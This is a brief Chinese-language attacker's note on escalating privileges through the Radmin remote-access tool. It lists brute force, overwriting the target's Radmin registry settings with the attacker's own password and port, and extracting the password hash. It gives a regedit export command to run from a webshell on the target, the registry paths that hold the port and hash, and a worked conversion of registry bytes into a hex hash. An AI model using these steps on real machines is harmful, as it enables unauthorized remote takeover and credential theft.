主题：radmin提权

1.暴力破解

2.注册表替换
本地配置服务端，把本地服务端在注册表内的信息导出，上传到目标机，导入目标机，这样目标机的radmin就是我们的配置信息了（密码和端口）。在本地连接即可。

3.radmin本地提权

4.radmin本地提权延伸——radmin_hash

读取hash的方法：

1>.在webshell中导出注册表下载回来读取

regedit /e d:\1.reg HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter

2>.直接用海洋的注册表读取功能读取。

HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\port
HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter

226          E2
19           13
236          EC
144          90
73           49
189          BD
133          85
140          8C
30           1E
95           5F
82           52
66           42
202          CA
168          A8
197          C5
181          B5

e213ec9049bd858c1e5f5242caa8c5b5